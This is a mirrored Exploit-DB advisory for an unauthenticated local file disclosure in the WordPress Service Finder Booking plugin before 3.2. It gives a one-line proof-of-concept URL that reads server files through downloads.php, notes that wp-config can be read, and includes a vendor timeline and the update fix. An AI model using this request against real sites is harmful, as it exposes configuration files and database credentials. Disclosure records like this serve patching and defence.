bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/43475.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

23 lines
No EOL
877 B
Text
Raw Blame History

# Exploit Title: Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure
# Google Dork: N/A
# Date: 09/01/2018 (GMT+7)
# Exploit Author: telahdihapus
# Vendor Homepage: https://themeforest.net/user/aonetheme
# Software Link: https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793
# Tested on: windows 10
1. description :
unauthenticated user can access downloads.php, and can disclosure file in server through downloads.php, using method get on 'file=', user/attacker also can disclosure wp-config, or else file
2. POC :
http://victim.com/wp-content/plugins/sf-booking/lib/downloads.php?file=/index.php
3. timeline
- jan 1, 2018 report vendor
- jan 1, 2018 vendor send email
- jan 1, 2018 send poc
- jan 2, 2018 vendor contact team
- jan 8, 2018 vendor send email about fixed issue
4. solution :
update to version 3.2
Reference in a new issue View git blame Copy permalink